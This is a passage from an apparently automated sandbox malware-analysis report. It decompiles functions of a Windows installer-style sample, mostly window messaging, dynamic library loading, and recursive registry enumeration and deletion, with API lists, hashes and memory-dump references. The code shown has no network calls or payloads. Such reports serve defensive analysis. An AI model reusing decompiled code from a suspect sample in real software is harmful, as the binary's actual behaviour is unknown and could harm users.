					 *(_t64 + 8) = E00402B2C(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x38)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402B2C();
					_t32 = E00402B2C();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402B0A();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402B0A(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x20) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x34)) >= _t46) {
					_push( *(_t64 - 0xc));
					E004060C4();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                                                                    0x00401c0a
                                                                                                                                    0x00401c0c
                                                                                                                                    0x00401c13
                                                                                                                                    0x00401c16
                                                                                                                                    0x00401c19
                                                                                                                                    0x00401c23
                                                                                                                                    0x00401c27
                                                                                                                                    0x00401c2a
                                                                                                                                    0x00401c33
                                                                                                                                    0x00401c33
                                                                                                                                    0x00401c36
                                                                                                                                    0x00401c3a
                                                                                                                                    0x00401c43
                                                                                                                                    0x00401c43
                                                                                                                                    0x00401c46
                                                                                                                                    0x00401c4a
                                                                                                                                    0x00401c4c
                                                                                                                                    0x00401ca1
                                                                                                                                    0x00401ca3
                                                                                                                                    0x00401cac
                                                                                                                                    0x00401cb4
                                                                                                                                    0x00401cb7
                                                                                                                                    0x00401cb7
                                                                                                                                    0x00401cc0
                                                                                                                                    0x00000000
                                                                                                                                    0x00401c4e
                                                                                                                                    0x00401c55
                                                                                                                                    0x00401c57
                                                                                                                                    0x00401c5a
                                                                                                                                    0x00401c60
                                                                                                                                    0x00401c67
                                                                                                                                    0x00401c6a
                                                                                                                                    0x00401c92
                                                                                                                                    0x00401cc6
                                                                                                                                    0x00401cc6
                                                                                                                                    0x00401c6c
                                                                                                                                    0x00401c7a
                                                                                                                                    0x00401c82
                                                                                                                                    0x00401c85
                                                                                                                                    0x00401c85
                                                                                                                                    0x00401c6a
                                                                                                                                    0x00401cc9
                                                                                                                                    0x00401ccc
                                                                                                                                    0x00401cd2
                                                                                                                                    0x00402960
                                                                                                                                    0x00402960
                                                                                                                                    0x004029bb
                                                                                                                                    0x004029c7

                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                    • String ID: !
                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                    • Opcode ID: 2dec6e84910924bf84c24d28bd9d45bfa1e8254c806c2ac19f9f909d36db64fa
                                                                                                                                    • Instruction ID: 78ecb546e6904f741386b34373d95fc9c650d204ccfbd40682174e5e3811ccf7
                                                                                                                                    • Opcode Fuzzy Hash: 2dec6e84910924bf84c24d28bd9d45bfa1e8254c806c2ac19f9f909d36db64fa
                                                                                                                                    • Instruction Fuzzy Hash: 0D216BB1944208BEEF06AFA4D98AAAD7FB5EF44304F10457EF501B61D1D7B88640DB18
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00404A3D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                    			E00404A3D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00406188(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00406188(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00406188(_t41, _t47, 0x42a898, 0x42a898, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a898), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a898);
			}



















                                                                                                                                    0x00404a43
                                                                                                                                    0x00404a48
                                                                                                                                    0x00404a50
                                                                                                                                    0x00404a51
                                                                                                                                    0x00404a5e
                                                                                                                                    0x00404a66
                                                                                                                                    0x00404a67
                                                                                                                                    0x00404a69
                                                                                                                                    0x00404a6b
                                                                                                                                    0x00404a6d
                                                                                                                                    0x00404a70
                                                                                                                                    0x00404a70
                                                                                                                                    0x00404a77
                                                                                                                                    0x00404a7d
                                                                                                                                    0x00404a7d
                                                                                                                                    0x00404a84
                                                                                                                                    0x00404a8b
                                                                                                                                    0x00404a8e
                                                                                                                                    0x00404a91
                                                                                                                                    0x00404a91
                                                                                                                                    0x00404a95
                                                                                                                                    0x00404aa5
                                                                                                                                    0x00404aa7
                                                                                                                                    0x00404aaa
                                                                                                                                    0x00404a53
                                                                                                                                    0x00404a53
                                                                                                                                    0x00404a5a
                                                                                                                                    0x00404a5a
                                                                                                                                    0x00404ab2
                                                                                                                                    0x00404abd
                                                                                                                                    0x00404ad3
                                                                                                                                    0x00404ae3
                                                                                                                                    0x00404aff

                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(0042A898,0042A898,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404958,000000DF,00000000,00000400,?), ref: 00404ADB
                                                                                                                                    • wsprintfA.USER32 ref: 00404AE3
                                                                                                                                    • SetDlgItemTextA.USER32 ref: 00404AF6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                    • Opcode ID: 07b20e06a4e15d154d570ddcb83dacc27f88af3d06365e8a7daae3fc43d26942
                                                                                                                                    • Instruction ID: b6947819cf3d2f6237f51ad6bc4181ce5d30b763e3cace0042aa431f2da3fcd6
                                                                                                                                    • Opcode Fuzzy Hash: 07b20e06a4e15d154d570ddcb83dacc27f88af3d06365e8a7daae3fc43d26942
                                                                                                                                    • Instruction Fuzzy Hash: 6811B7736441283BDB0065A99C45EAF3298DB85374F250237FE26F61D1EA79CC2246ED
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405AFE, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405AFE(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                                                                                                    0x00405aff
                                                                                                                                    0x00405b16
                                                                                                                                    0x00405b1e
                                                                                                                                    0x00405b1e
                                                                                                                                    0x00405b26

                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403396,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 00405B04
                                                                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403396,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 00405B0D
                                                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B1E
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405AFE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 2659869361-3081826266
                                                                                                                                    • Opcode ID: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
                                                                                                                                    • Instruction ID: 4783a6558ad93634efccf2c5b59b7c2f7de2676992766bb99f9d95ab254c3fcf
                                                                                                                                    • Opcode Fuzzy Hash: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
                                                                                                                                    • Instruction Fuzzy Hash: DCD0A9B2601A303ED2022615AC09ECB2A688F0B304B060027F240BA1A2CA3C1E5287FE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040206A, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E0040206A(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4f8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402B2C(0xfffffff0);
				 *(_t34 + 8) = E00402B2C(1);
				if( *((intOrPtr*)(_t34 - 0x24)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040528D(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x2c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b870, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x2c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x28)) == _t27 && E00403923(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}








                                                                                                                                    0x0040206a
                                                                                                                                    0x0040206a
                                                                                                                                    0x0040206f
                                                                                                                                    0x00402076
                                                                                                                                    0x00402131
                                                                                                                                    0x004022a4
                                                                                                                                    0x004022a4
                                                                                                                                    0x004029b8
                                                                                                                                    0x004029bb
                                                                                                                                    0x004029c7
                                                                                                                                    0x004029c7
                                                                                                                                    0x00402085
                                                                                                                                    0x0040208f
                                                                                                                                    0x00402092
                                                                                                                                    0x004020a1
                                                                                                                                    0x004020ab
                                                                                                                                    0x004020af
                                                                                                                                    0x0040212a
                                                                                                                                    0x00000000
                                                                                                                                    0x0040212a
                                                                                                                                    0x004020b1
                                                                                                                                    0x004020ba
                                                                                                                                    0x004020be
                                                                                                                                    0x00402102
                                                                                                                                    0x004020c0
                                                                                                                                    0x004020c3
                                                                                                                                    0x004020c6
                                                                                                                                    0x004020f6
                                                                                                                                    0x004020c8
                                                                                                                                    0x004020cb
                                                                                                                                    0x004020d4
                                                                                                                                    0x004020d6
                                                                                                                                    0x004020d6
                                                                                                                                    0x004020d4
                                                                                                                                    0x004020c6
                                                                                                                                    0x0040210a
                                                                                                                                    0x0040211f
                                                                                                                                    0x0040211f
                                                                                                                                    0x00000000
                                                                                                                                    0x0040210a
                                                                                                                                    0x0040209b
                                                                                                                                    0x0040209f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00402095
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052C6
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(00402DEC,0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052D6
                                                                                                                                      • Part of subcall function 0040528D: lstrcatA.KERNEL32(0042A078,00402DEC,00402DEC,0042A078,00000000,00000000,00000000), ref: 004052E9
                                                                                                                                      • Part of subcall function 0040528D: SetWindowTextA.USER32(0042A078,0042A078), ref: 004052FB
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405321
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040533B
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405349
                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020A5
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2987980305-0
                                                                                                                                    • Opcode ID: 2c41acbe1a58d5993be08d6f6e6b28b50d17c5afd77edb3e1c457816e7c537cb
                                                                                                                                    • Instruction ID: 1e62f077ed187e7b54f73df6e4690413272663ac282197ee05868da0157e3bc8
                                                                                                                                    • Opcode Fuzzy Hash: 2c41acbe1a58d5993be08d6f6e6b28b50d17c5afd77edb3e1c457816e7c537cb
                                                                                                                                    • Instruction Fuzzy Hash: 1B21C671900214ABCF11BFA4CF89AAE7974AF05358F20413BF511B62D0D6FD89829A1E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402C2E, Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                    			E00402C2E(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				char _v272;
				void* _t19;
				signed int _t25;
				intOrPtr* _t27;
				signed int _t32;
				signed int _t33;
				signed int _t34;

				_t33 = _a12;
				_t34 = _t33 & 0x00000300;
				_t32 = _t33 & 0x00000001;
				_t19 = E00405FEC(__eflags, _a4, _a8, _t34 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _t32;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 0x3eb;
						}
						_t25 = E00402C2E(__eflags, _v8,  &_v272, _a12);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E004064FE(3);
					if(_t27 == 0) {
						return RegDeleteKeyA(_a4, _a8);
					}
					return  *_t27(_a4, _a8, _t34, 0);
				}
				return _t19;
			}











                                                                                                                                    0x00402c39
                                                                                                                                    0x00402c42
                                                                                                                                    0x00402c4b
                                                                                                                                    0x00402c57
                                                                                                                                    0x00402c5e
                                                                                                                                    0x00402c82
                                                                                                                                    0x00402c68
                                                                                                                                    0x00402c6a
                                                                                                                                    0x00402cbd
                                                                                                                                    0x00000000
                                                                                                                                    0x00402cc3
                                                                                                                                    0x00402c79
                                                                                                                                    0x00402c7e
                                                                                                                                    0x00402c80
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402c80
                                                                                                                                    0x00402c9c
                                                                                                                                    0x00402ca4
                                                                                                                                    0x00402cab
                                                                                                                                    0x00000000
                                                                                                                                    0x00402cd0
                                                                                                                                    0x00000000
                                                                                                                                    0x00402cb6
                                                                                                                                    0x00402cda

                                                                                                                                    APIs
                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$Enum
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 464197530-0
                                                                                                                                    • Opcode ID: cba0278263bc03600708203fc435bba4fcda38ed50437662e6a3aa3c8f338271
                                                                                                                                    • Instruction ID: 0191349a5772dece43551cf2df1613e3fd7bf5efaca1991f01b23b14bf017e3e
                                                                                                                                    • Opcode Fuzzy Hash: cba0278263bc03600708203fc435bba4fcda38ed50437662e6a3aa3c8f338271
                                                                                                                                    • Instruction Fuzzy Hash: 1B116A32504109FBEF129F90DF09B9E7B6DEB14340F204036BD45B61E0E7B59E25AB68
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405201, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E00405201(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a884 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a884 = _t16;
							E00404BC7();
						}
						L11:
						return CallWindowProcA( *0x42a88c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404B47(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404240(0x413);
				return 0;
			}





                                                                                                                                    0x00405205
                                                                                                                                    0x0040520f
                                                                                                                                    0x0040522b
                                                                                                                                    0x0040524d
                                                                                                                                    0x00405250
                                                                                                                                    0x00405256
                                                                                                                                    0x00405260
                                                                                                                                    0x00405261
                                                                                                                                    0x00405263
                                                                                                                                    0x00405269
                                                                                                                                    0x00405269
                                                                                                                                    0x00405273
                                                                                                                                    0x00000000
                                                                                                                                    0x00405281
                                                                                                                                    0x00405238
                                                                                                                                    0x00405270
                                                                                                                                    0x00405270
                                                                                                                                    0x00000000
                                                                                                                                    0x00405270
                                                                                                                                    0x00405244
                                                                                                                                    0x00405246
                                                                                                                                    0x00000000
                                                                                                                                    0x00405246
                                                                                                                                    0x00405215
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040521c
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00405230
                                                                                                                                    • CallWindowProcA.USER32 ref: 00405281
                                                                                                                                      • Part of subcall function 00404240: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00404252
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                    • Opcode ID: d3251c14134478d2d59c94d69b6c29095ae239f289e1cb20b942a85f63b4625b
                                                                                                                                    • Instruction ID: 7ad44c5dbd4f0c22509592cdf29d01bef16ea56332e5e379f7ee7dd57f249553
                                                                                                                                    • Opcode Fuzzy Hash: d3251c14134478d2d59c94d69b6c29095ae239f289e1cb20b942a85f63b4625b
                                                                                                                                    • Instruction Fuzzy Hash: EA019E3120060CAFDF209F50ED84E5B3765EF84350F64003BFA00761D0C73A9892AE1E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040604D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E0040604D(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405FEC(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                                                                    0x0040605b
                                                                                                                                    0x0040605d
                                                                                                                                    0x00406075
                                                                                                                                    0x0040607a
                                                                                                                                    0x0040607f
                                                                                                                                    0x004060bc
                                                                                                                                    0x004060bc
                                                                                                                                    0x00406081
                                                                                                                                    0x00406093
                                                                                                                                    0x0040609e
                                                                                                                                    0x004060a4
                                                                                                                                    0x004060ae
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004060ae
                                                                                                                                    0x004060c1

                                                                                                                                    APIs
                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,0042A078,?,?,?,00000002,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,00406291,80000002), ref: 00406093
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00406291,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,?,0042A078), ref: 0040609E
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent, xrefs: 00406050, 00406084
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
